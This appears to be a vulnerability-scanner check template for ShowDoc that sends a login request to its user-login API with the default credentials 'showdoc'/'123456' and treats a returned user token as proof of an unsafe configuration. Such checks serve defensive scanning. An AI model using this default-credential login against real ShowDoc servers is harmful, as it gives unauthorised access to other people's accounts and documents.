name: yaml-poc-showdoc-showdoc-unsafe_config-CT-158413
binding: 50556a71-46cd-40d6-b664-6c4f88bc95ce
detail:
    author: zikai.zhao
    vulnerability:
        id: 7f08641a-fa99-46ae-b721-e666fe890a3e
        level: high
    warning: Harmless
transport: http
rules:
    r0:
        request:
            cache: true
            method: POST
            path: /server/index.php?s=/api/user/login
            headers:
                Content-Type: application/x-www-form-urlencoded
            body: username=showdoc&password=123456
            follow_redirects: true
        expression: response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token") && response.body.bcontains(b"showdoc")
expression: r0()
